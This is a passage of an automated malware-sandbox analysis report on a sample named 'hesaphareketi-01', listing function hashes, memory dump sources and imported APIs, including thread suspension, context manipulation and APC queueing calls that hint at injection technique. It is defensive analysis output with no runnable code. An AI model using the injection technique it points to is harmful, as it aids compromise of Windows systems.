                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a88597bd80fbec51528b2ed85b6bd883d763db581cbee44f11464c4b77c7b693
                                                  • Instruction ID: d38225d4a3fd494e6e56e924e92ae40456c4534e7c45ddd29f2dde224e0d6a0d
                                                  • Opcode Fuzzy Hash: a88597bd80fbec51528b2ed85b6bd883d763db581cbee44f11464c4b77c7b693
                                                  • Instruction Fuzzy Hash: 9A913672B15A9593DB588F0AE4806A87BA2F785BC0F854139DB4ED7B09DF3CD805DB10
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 437c2bb9eed3bb237656b73319d9a7c63277ab8907db6804528c2f463d4bd837
                                                  • Instruction ID: f2611abccf74043bac6868b1a193a98daec546572f8be02cc03bae415d30e0eb
                                                  • Opcode Fuzzy Hash: 437c2bb9eed3bb237656b73319d9a7c63277ab8907db6804528c2f463d4bd837
                                                  • Instruction Fuzzy Hash: EF512B12F5BF0D11E90E9B3B6181679C1825F5A7C0E9CCB31DA0E72791EF7DB092A110
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: dd315fed3be031c9e26a90a11914652993b972776a13770548698b9b4cb4de5d
                                                  • Instruction ID: 9f92853b34f2199f1b8d433816e6705571043b61b87492f21dcd302e9a1ce060
                                                  • Opcode Fuzzy Hash: dd315fed3be031c9e26a90a11914652993b972776a13770548698b9b4cb4de5d
                                                  • Instruction Fuzzy Hash: C8613832E19F8955DA1EDF26A4C1928E39ABF457C0B949335DE0FA3251DF3CA092D610
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalSection$EnterLeave
                                                  • String ID:
                                                  • API String ID: 3168844106-0
                                                  • Opcode ID: 1fa7a848999a6a82e6943152a9856c355e6e1e90088799d98739f212ba5528bb
                                                  • Instruction ID: 89f1ca8f88a19968f1302c81f8992887b6fdbfacee4c00419c5013dd5a4cb25e
                                                  • Opcode Fuzzy Hash: 1fa7a848999a6a82e6943152a9856c355e6e1e90088799d98739f212ba5528bb
                                                  • Instruction Fuzzy Hash: B821D822B2CA4262EF9CAF37B2D167D53D0DB89794FC42231DF5C83A95DD18D5839600
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: SwitchThread
                                                  • String ID: X@2
                                                  • API String ID: 115865932-2772482207
                                                  • Opcode ID: 8855a6a9be19cc912e040998a95c185b2b15f028c0bb56cd1e5e4913b5d84e9d
                                                  • Instruction ID: 42e9128d08732e2c81f41352d331b4fcd9c249439b5d7ffc607aef82cbb58b46
                                                  • Opcode Fuzzy Hash: 8855a6a9be19cc912e040998a95c185b2b15f028c0bb56cd1e5e4913b5d84e9d
                                                  • Instruction Fuzzy Hash: 61A15F3AE0C94367FA6CBF27B8C0675A291AF46754F840139D85DD36D1DE3DB880B628
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ContextInitialize$AddressEnabledErrorFeaturesHandleLastModuleProcState
                                                  • String ID: InitializeContext2$kernel32.dll
                                                  • API String ID: 4102459504-3117029998
                                                  • Opcode ID: edabfeb27e12de1ac58e4de23520e38ce78f3386a9e832e640fcf79b6a971462
                                                  • Instruction ID: 650230c56ccf75286944b63513d337358b99ed5c8ccc2cab28ec2ea6b94bf1c1
                                                  • Opcode Fuzzy Hash: edabfeb27e12de1ac58e4de23520e38ce78f3386a9e832e640fcf79b6a971462
                                                  • Instruction Fuzzy Hash: 97318362A09B56A1FE08EF56B980279E3A0EF45BD0F840435DD4D937A4DF7CE446D720
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Thread$AddressContextErrorLastLibraryLoadProcResumeSuspend
                                                  • String ID: QueueUserAPC2$kernel32
                                                  • API String ID: 3714266957-4022151419
                                                  • Opcode ID: 1854c6662005a05bccb6cd86df4f5362b47cb18156353affd7ed6c801de71de6
                                                  • Instruction ID: ddbfc9b948aa187294029b4fb9b2d2b683755e430dcd5811faaac888a36942d8
                                                  • Opcode Fuzzy Hash: 1854c6662005a05bccb6cd86df4f5362b47cb18156353affd7ed6c801de71de6
                                                  • Instruction Fuzzy Hash: 54317F62A08E4261EE58FF1BB8C4379A361EF46BE4F800234D85ED76E4DF3CE4019660
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Thread$CriticalSectionSwitch$Leave$CurrentEnter
                                                  • String ID:
                                                  • API String ID: 2584832284-0
                                                  • Opcode ID: 911a7cc94664f48a14bb56dfd2eba76f0f521efe915744327b0e3e75a7d93955
                                                  • Instruction ID: 85a8ebe1bd25ee9dd0ac4f1890b6fb7a16dce1295d9b9fc1a1d8737f1d5f651e
                                                  • Opcode Fuzzy Hash: 911a7cc94664f48a14bb56dfd2eba76f0f521efe915744327b0e3e75a7d93955
                                                  • Instruction Fuzzy Hash: DE513E61E0D913B6FA1CBF27B8C1575E291AF49700FC00239E55DD3292CE3DB842AA72
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Current$Thread$DuplicateExceptionFailFastHandleProcessQueryRaiseVirtual
                                                  • String ID:
                                                  • API String ID: 510365852-3916222277
                                                  • Opcode ID: fabd27e107bbfd348c5fcb363ee42fc01df79ff2f7dd51d048f6b6b90d90cb7c
                                                  • Instruction ID: 8f73d5e803eeb54d74bf7d42bdf2b82d285dc04d4c335ea7495920106353b528
                                                  • Opcode Fuzzy Hash: fabd27e107bbfd348c5fcb363ee42fc01df79ff2f7dd51d048f6b6b90d90cb7c
                                                  • Instruction Fuzzy Hash: B311B372608B818AD754FF16B44019AB3A1FB457B8F440335EABD4B7D6CF39D4418700
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: SwitchThread
                                                  • String ID:
                                                  • API String ID: 115865932-0
                                                  • Opcode ID: cc35ecd5a93063da1183701248f17dca1c596e2e1d8d9986a40f28483dcd9575
                                                  • Instruction ID: 336a8976f99be9f28419eeeb11c8e537e941f71185d1ab295ce5594792266598
                                                  • Opcode Fuzzy Hash: cc35ecd5a93063da1183701248f17dca1c596e2e1d8d9986a40f28483dcd9575
                                                  • Instruction Fuzzy Hash: 99812021A0D90366FA1CBF27B8C0635A2D16F45754F840239DA5EC76E5DE3DF842BA31
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8155321a93176bc4c4200af923682af65ca18711955211ed52f216cd2b673b30
                                                  • Instruction ID: 361a4ece5902965c6c328a8be92ac8594639eb0b68ccc0cb0b99aa0e967cdd6f
                                                  • Opcode Fuzzy Hash: 8155321a93176bc4c4200af923682af65ca18711955211ed52f216cd2b673b30
                                                  • Instruction Fuzzy Hash: 6C71A322A0EA42A1EA58BF63B580279E3D5FF41BD4F880139DE5D97695DF3CE441A320
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalSection$EnterLeave
                                                  • String ID:
                                                  • API String ID: 3168844106-0
                                                  • Opcode ID: dfead87ec6108077648ad3825d3ea0080477edc8ca47081f20bdd0a0302174ed
                                                  • Instruction ID: 5c393fb41bdc3aee75531f715d8f02de5136935ae2bf64cd5e68f55a7550b2c0
                                                  • Opcode Fuzzy Hash: dfead87ec6108077648ad3825d3ea0080477edc8ca47081f20bdd0a0302174ed
                                                  • Instruction Fuzzy Hash: 29E10062B06E56A5DA18DF52E8946B8A390FF043F4F804336DA3D97BD8DE38D019D310
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionFailFastRaise
                                                  • String ID: Process is terminating due to StackOverflowException.
                                                  • API String ID: 2546344036-2200901744
                                                  • Opcode ID: a73f9b0b1186b8bf137041686a0ee60befa2ebf5b9cf55ecf46c091e51a068e4
                                                  • Instruction ID: 10ab5ead5452b7c74e14079001085887467cf8c49a5e9965888c3df8410398cc
                                                  • Opcode Fuzzy Hash: a73f9b0b1186b8bf137041686a0ee60befa2ebf5b9cf55ecf46c091e51a068e4
                                                  • Instruction Fuzzy Hash: 2051B873A08E4661EE58AF17E8C03B993A0EF4AB94F844135D91ED7790DF3DE455A320
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(?,?,?,?,000002367F400000,00007FF734212EBD,?,?,00000000,00007FF7341FF8AC,?,FFFFFFFF,47AE147AE147AE15,00007FF7341E945C), ref: 00007FF734212E12
                                                  • GetProcAddress.KERNEL32(?,?,?,?,000002367F400000,00007FF734212EBD,?,?,00000000,00007FF7341FF8AC,?,FFFFFFFF,47AE147AE147AE15,00007FF7341E945C), ref: 00007FF734212E2C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                   • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: GetEnabledXStateFeatures$kernel32.dll
                                                  • API String ID: 2574300362-4754247
                                                  • Opcode ID: 14ea90d1c4bf5a15a4085266709c85a67ad0a07a71323ba950ff44953a265e56
                                                  • Instruction ID: 11d245af992c869873ea92042eeaa1e82e60f91f456b80e3d1e451abbb5e5023
                                                  • Opcode Fuzzy Hash: 14ea90d1c4bf5a15a4085266709c85a67ad0a07a71323ba950ff44953a265e56
                                                  • Instruction Fuzzy Hash: 1C21EB51F1C15252FFAC9B66E8D137993A19B54390FC44039E90EF67D4DD1EF880A620
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                   • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: GetEnabledXStateFeatures$kernel32
                                                  • API String ID: 2574300362-4273408117
                                                  • Opcode ID: 274e0da2db24af44fa31abf1e79a32452a2f4646b1ed88df6da63e7f0bd2eccf
                                                  • Instruction ID: e45e8f7b53de73d1acc3118edbdf29fdf46fcbeb60504d5c20a41cf2d46dd969
                                                  • Opcode Fuzzy Hash: 274e0da2db24af44fa31abf1e79a32452a2f4646b1ed88df6da63e7f0bd2eccf
                                                  • Instruction Fuzzy Hash: 10E0BF55F0AB12A2FE4DBF576CD127893516F45781FC84078C90D92390EE3CA659A720
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                   • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: GetEnabledXStateFeatures$kernel32
                                                  • API String ID: 2574300362-4273408117
                                                  • Opcode ID: ce6f5296a204aba61ce9ef49dc43d2f12b23842fbe95b74c7dd249d319ed59f7
                                                  • Instruction ID: 8d5f2fa6c870154c6b8a9087a008e94d3eafc30e8031b6d0146797c24e0899f7
                                                  • Opcode Fuzzy Hash: ce6f5296a204aba61ce9ef49dc43d2f12b23842fbe95b74c7dd249d319ed59f7
                                                  • Instruction Fuzzy Hash: 3CE04F55F1A602A2FF4DBF53ACC53B593606F99741FC84138C91E92391AD3CA24AB720
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                   • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: SwitchThread
                                                  • String ID:
                                                  • API String ID: 115865932-0
                                                  • Opcode ID: f4aaa3f96c492ce6e17f0f5d835cb774c61d338c5d6bba280d5d4821285017cf
                                                  • Instruction ID: 6a1f56622fc5709d4cc5efc0548a3b000cfd6ee8ec324a3fa6eb0d25fc77fac5
                                                  • Opcode Fuzzy Hash: f4aaa3f96c492ce6e17f0f5d835cb774c61d338c5d6bba280d5d4821285017cf
                                                  • Instruction Fuzzy Hash: 0D410832E0855291EF6CAE27D0C413DE2D0EF14F94F94853AD61ED67E5CE2DE480A762
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                   • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: SwitchThread
                                                  • String ID:
                                                  • API String ID: 115865932-0
                                                  • Opcode ID: 44b941e54b3c05b20f0b851b031452e57e334a5e19445be4892a4e80d52cd89e
                                                  • Instruction ID: 37d87e9f65da8fae5b7fc7546072106b0241e0f000ff300c79644f8ba4c8896d
                                                  • Opcode Fuzzy Hash: 44b941e54b3c05b20f0b851b031452e57e334a5e19445be4892a4e80d52cd89e
                                                  • Instruction Fuzzy Hash: 42514E21E0A94366FA9CBF27B9C4675B2E46F01750F844239DA1DD72D1DE2DBC02B630
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                   • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: BreakDebug
                                                  • String ID:
                                                  • API String ID: 456121617-0
                                                  • Opcode ID: e4ab8514af3f6f014f6506373d7b9cbb823d7638c04cae421d012170a137b048
                                                  • Instruction ID: 0991d4f105f01a96755388ab579b474d7193211aa49081799b53c3e81d9fca84
                                                  • Opcode Fuzzy Hash: e4ab8514af3f6f014f6506373d7b9cbb823d7638c04cae421d012170a137b048
                                                  • Instruction Fuzzy Hash: D0411922A0D685A1FA596F12A08C379E7E0EF44B54F890438CE4DA7395CFBDE4C1D322
                                                  APIs
                                                  Memory Dump Source
